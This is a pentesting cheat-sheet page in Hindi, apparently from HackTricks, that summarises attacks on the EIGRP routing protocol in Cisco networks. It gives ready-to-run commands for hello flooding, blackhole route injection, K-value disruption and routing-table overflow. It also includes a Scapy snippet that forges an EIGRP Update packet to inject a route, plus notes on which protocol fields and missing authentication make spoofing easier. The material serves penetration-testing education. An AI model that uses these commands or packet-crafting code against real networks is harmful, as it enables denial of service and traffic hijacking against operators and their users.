EIGRP हमले

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

यह उन हमलों का सारांश है जो https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 में दिखाए गए हैं। अधिक जानकारी के लिए उसे देखें।

Fake EIGRP Neighbors Attack

  • उद्देश्य: EIGRP hello packets से router CPU को ओवरलोड करके उन्हें Denial of Service (DoS) तक पहुँचाना।
  • उपकरण: helloflooding.py स्क्रिप्ट।
  • क्रियान्वयन:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
  • पैरामीटर:
  • --interface: नेटवर्क इंटरफ़ेस निर्दिष्ट करता है, उदाहरण के लिए eth0
  • --as: EIGRP autonomous system नंबर निर्दिष्ट करता है, उदाहरण के लिए 1
  • --subnet: सबनेट स्थान सेट करता है, उदाहरण के लिए 10.10.100.0/24

EIGRP Blackhole Attack

  • उद्देश्य: एक गलत route इंजेक्ट करके नेटवर्क ट्रैफ़िक फ्लो को विखलित करना, जिससे ट्रैफ़िक एक ऐसे गंतव्य (blackhole) की ओर चला जाए जो अस्तित्व में नहीं है।
  • उपकरण: routeinject.py स्क्रिप्ट।
  • क्रियान्वयन:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
  • पैरामीटर:
  • --interface: attacker की सिस्टम इंटरफ़ेस निर्दिष्ट करता है।
  • --as: EIGRP AS नंबर निर्दिष्ट करता है।
  • --src: attacker का IP पता सेट करता है।
  • --dst: target subnet IP सेट करता है।
  • --prefix: target subnet IP का मास्क निर्दिष्ट करता है।

Abusing K-Values Attack

  • उद्देश्य: K-values बदलकर EIGRP डोमेन में लगातार व्यवधान और पुनः कनेक्शन उत्पन्न करना, जिससे परिणामस्वरूप DoS हमला हो सके।
  • उपकरण: relationshipnightmare.py स्क्रिप्ट।
  • क्रियान्वयन:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
  • पैरामीटर:
  • --interface: नेटवर्क इंटरफ़ेस निर्दिष्ट करता है।
  • --as: EIGRP AS नंबर निर्दिष्ट करता है।
  • --src: वैध राउटर का IP Address सेट करता है।

Routing Table Overflow Attack

  • उद्देश्य: असली राउटर के CPU और RAM पर दबाव डालने के लिए routing table को अनेक गलत रूट्स से भर देना।
  • उपकरण: routingtableoverflow.py स्क्रिप्ट।
  • क्रियान्वयन:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
  • पैरामीटर:
  • --interface: नेटवर्क इंटरफ़ेस निर्दिष्ट करता है।
  • --as: EIGRP AS नंबर निर्दिष्ट करता है।
  • --src: attacker का IP पता सेट करता है।

Protocol Notes Useful for Attacks

  • HELLO packets carry K-values and neighbors only form when they match. यह K-value mismatch/relationship disruption हमलों का आधार है और यही कारण है कि mismatched K-values adjacency को रोकते हैं।
  • The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, इसलिए passive captures से सेगमेंट पर उपयोग किए गए सटीक मान दिखाई देते हैं।

Scapy पैकेट निर्माण (Route Injection / Fake Neighbors)

Scapy में EIGRP contrib layer आता है जिसमें EIGRPParam और EIGRPIntRoute जैसे TLV होते हैं, जो route injection के लिए UPDATEs बनाने के लिए पर्याप्त हैं। उदाहरण davidbombal/scapy EIGRP route injection script से अनुकूलित:

from scapy.all import *
load_contrib("eigrp")

sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))

इसी repo में तेज़ “fake neighbor” स्क्रिप्ट्स हैं जो एक असली EIGRP पैकेट को sniff करके उसे एक spoofed स्रोत IP के साथ replay करती हैं ताकि phantom neighbors बनाए जा सकें (CPU/neighbor-table पर दबाव डालने के लिए उपयोगी)।

  • Scapy EIGRP contrib डॉक्स: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
  • Example scripts: https://github.com/davidbombal/scapy

Routopsy & NSE सहायक

  • Routopsy एक वर्चुअल-राउटर अटैक लैब बनाता है (FRRouting + Scapy) और इसमें DRP attacks शामिल हैं जिन्हें आप EIGRP tests के लिए अनुकूलित कर सकते हैं। https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
  • Nmap का NSE एक छोटी eigrp लाइब्रेरी प्रदान करता है जो EIGRP पैकेट्स के एक subset को parsing/generating के लिए उपयोगी है। https://nmap.org/nsedoc/lib/eigrp.html

Authentication Recon

  • EIGRP named mode HMAC-SHA-256 authentication का समर्थन करता है via authentication mode hmac-sha-256 ...। यदि सक्षम है, तो crafted packets को सही key के साथ authenticated होना होगा; यदि सक्षम नहीं है, तो spoofing/injection को validate करना आसान होता है।

संदर्भ

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें